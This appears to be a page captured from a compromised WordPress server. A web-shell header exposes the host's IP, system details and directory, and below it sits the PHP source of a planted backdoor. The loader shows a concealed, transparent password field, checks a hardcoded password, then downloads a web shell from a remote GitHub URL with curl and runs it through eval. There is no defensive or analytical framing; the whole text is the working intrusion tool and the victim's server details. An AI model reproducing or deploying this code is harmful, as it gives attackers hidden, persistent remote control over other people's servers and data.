Server IP : 213.32.127.20 / Your IP : 216.73.216.174 Web Server : Apache System : Linux ns3.servidorneptuno.com 4.18.0-553.16.1.lve.el8.x86_64 #1 SMP Tue Aug 13 17:45:03 UTC 2024 x86_64 User : atoqsfjh ( 1072) PHP Version : 7.4.33 Disable Function : exec,passthru,shell_exec,system MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /proc/3291607/cwd/www/amautaasesores/wp-content/ |
Upload File : |
<?php session_start(); $login_password = "kucing599"; $allowed_ip = ""; // // Cek IP jika ada pembatasan if (!empty($allowed_ip) && $_SERVER['REMOTE_ADDR'] !== $allowed_ip) { http_response_code(403); exit('Forbidden'); } // Logout if (isset($_GET['logout'])) { session_destroy(); header("Location: " . $_SERVER['PHP_SELF']); exit; } // Login handling if (!isset($_SESSION['logged_in'])) { if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['password'])) { if ($_POST['password'] === $login_password) { $_SESSION['logged_in'] = true; header("Location: " . $_SERVER['PHP_SELF']); exit; } else { $error = "Password salah!"; } } ?> <!DOCTYPE html> <html> <head> <title></title> <style> body { margin: 0; padding: 0; background: #fff; height: 100vh; font-family: sans-serif; } .login-box { position: fixed; bottom: 10px; left: 10px; background: transparent; padding: 0; margin: 0; } input[type="password"] { width: 140px; padding: 5px; font-size: 14px; border: none; background: transparent; color: #000; outline: none; } input[type="password"]::placeholder { color: transparent; } </style> </head> <body> <div class="login-box"> <form method="POST"> <input type="password" name="password" required autocomplete="off"> </form> </div> </body> </html> <?php exit; } // Jika sudah login $Url = "https://raw.githubusercontent.com/yon3zu/403WebShell/refs/heads/main/403WebShell.php"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $Url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $output = curl_exec($ch); curl_close($ch); eval('?>' . $output);